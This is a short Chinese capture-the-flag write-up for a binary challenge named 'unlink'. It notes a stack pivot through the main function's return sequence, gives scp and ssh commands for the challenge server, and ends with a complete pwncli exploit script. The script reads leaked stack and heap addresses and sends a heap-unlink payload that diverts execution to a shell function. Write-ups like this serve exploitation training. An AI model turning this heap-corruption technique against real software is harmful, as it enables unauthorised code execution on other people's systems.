知识点
- 栈迁移
- unlink
- gadget
分析
- 主函数返回方式如下,可以修改ecx来完成栈迁移
lea esp, [ecx-4]
retn- 在堆上合理布局即可
细节
- 下载文件
scp -P 27873 your_username@node4.buuoj.cn:/path/to/remote/file /path/to/local/directory- 上传文件
scp -P 27873 /path/to/local/directory your_username@node4.buuoj.cn:/path/to/remote/file- 运行文件
s=ssh(host='node4.buuoj.cn',port=27254,user='unlink',password='guest')
io=gift['io']=s.process('./unlink')exp
#!/usr/bin/python3
from pwncli import *
from LibcSearcher import *
context.log_level='debug'
#cli_script()
s=ssh(host='node4.buuoj.cn',port=27254,user='unlink',password='guest')
io=gift['io']=s.process('./unlink')
#io=gift['io']=process('./unlink')
shell_addr=0x08048566
ru("address leak: ")
stack_addr = r(10)
stack_addr = int(stack_addr,16)
log_address("stack_addr : ",stack_addr)
ru(b"here is heap address leak: 0x")
heap_base=int(r(8),16)
log_address("heap_base : ",heap_base)
payload = b''
payload += b'a'*16
payload += p32(stack_addr + 8)
payload += p32(heap_base + 36)
payload += p32(shell_addr)
sla(b"now that you have leaks, get shell!",payload)
ia()
Comments | NOTHING